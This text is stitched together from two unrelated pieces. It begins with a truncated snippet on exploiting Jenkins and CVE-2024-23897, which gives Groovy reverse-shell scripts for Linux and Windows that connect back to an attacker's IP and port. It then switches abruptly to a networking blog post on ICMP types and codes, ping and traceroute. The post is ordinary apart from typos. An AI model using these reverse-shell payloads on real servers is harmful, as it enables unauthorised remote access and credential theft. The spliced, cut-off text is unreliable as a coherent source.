Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
In this article, i am going to share some basic information on ICMP,Ping and Trace-Route. Also see how UDP make use of ICMP for error communication.
Firstly First ICMP.
ICMP is a very simple ,datagram-based protocol. Many other protocols rely up on ICMP to communicate the error conditions and hence it is mainly designed for error reporting and network-based troubleshooting . Now lets familiarize with ICMP code and type. The ICMP type field identifies what type of ICMP packet is being sent.And the ICMP Code field provides much detailed information.
Common types of Code and Types are mentioned below.
Type 0 - Echo reply, which is usually the ping response.It says that the remote node is reachable over the network.
Type 3- Destination Unreachable, Which means the remote network or node is not reachable and there may be multiple reasons for that.
Btw, I have a very long story to say on ICMP Type 3, Code 3 and an affair with SNMP ,but not here :P .
Type 3 ICMP used the following codes.
- Code 0: Network Unreachable
- Code 1: Host Unreachable
- Code 3: Port Unreachable
- Code 9: Destination Network Administratively Prohibited
If the requested UDP port is not an open port, then a "port unreachable" code may be returnedConsider a person is sending a UDP packet to a remote destination from his machine. Assume that, there is a firewall placed on the path that blocks this UDP traffic.So the Firewall blocks the packet to the next hop for a destination and a "network unreachable" code will be returned to the sending host. Similarly,if the Firewall allows the traffic, but the destination host simply doesn't exist on the network, then a "host unreachable" code will be returned. However, if the host does exist on the network, but the requested UDP port is not an open port, then a "port unreachable" code may be returned by the intermediate device.
Type 5 - Redirect, Usually used to bring update in routing tables.
Type 8- Echo Request , So when we do a ping, ICMP type 8 packet gets initiated. And the response for this will be a Type 0.
Type 11 - Time exceeded , usually occurs during a routing loop.
There are two codes associated with type 11.
- Code 0: TTL Expired in transit
- Code 1: TTL Expired during reassembly
Next lets talk about Ping.
We all uses this ping command to check the connectivity and reach on the network. Ping sends multiple ICMP Echo Request packets to the remote node and waits for their replies(Echo reply).The ping command keeps track of when it sends the Echo Request packet and when it receives the corresponding Echo Reply. The difference between those two times is the round trip time. This is used to calculate the latency.
And finally, Trace-route
Trace-Route in Linux and Windows works differentlyTrace-route maps the route/hops through which the packet traversed to reach the destination. Lets see how the Trace-route actually works. The command works by sending a series of packets all going towards the same destination, with TIL values starting at 1.When the first packet is sent, its TTL expires at the first hop, so the router(or the intermediate device) replies with an lCMP "Destination Unreachable" or "Time Exceeded" message. The trace-route command receives this reply and looks inside the payload for the lP address of the sender, which it assumes is the first hop's router.Trace-route then sends a second packet, with a TIL of 2, which will expire at the second hop, generating another ICMP reply. Trace-route now knows the second hop as well. Similarly lt keeps sending packets this way, increment the TTL by 1 each time and getting replies from each hop until the packet reached the destination host.
In this way, it map all the hops in between and helps the administrator to see the actual path.
Once major catch here is, the Linux Trace-route and Windows Trace-route works differently, Though they may produce similar results.
Trace-route on Linux/UNIX typically send UDP datagrams to random high numbered ports on the destination host.
Windows Trace-routs typically use ICMP Echo Request packets. But both the Linux and Windows methods generate ICMP error messages at the routers giving the same results.How? Remember, UDP uses ICMP for error communication.
Hope this provides a brief overview on ICMP, Ping and Trace-Route basics.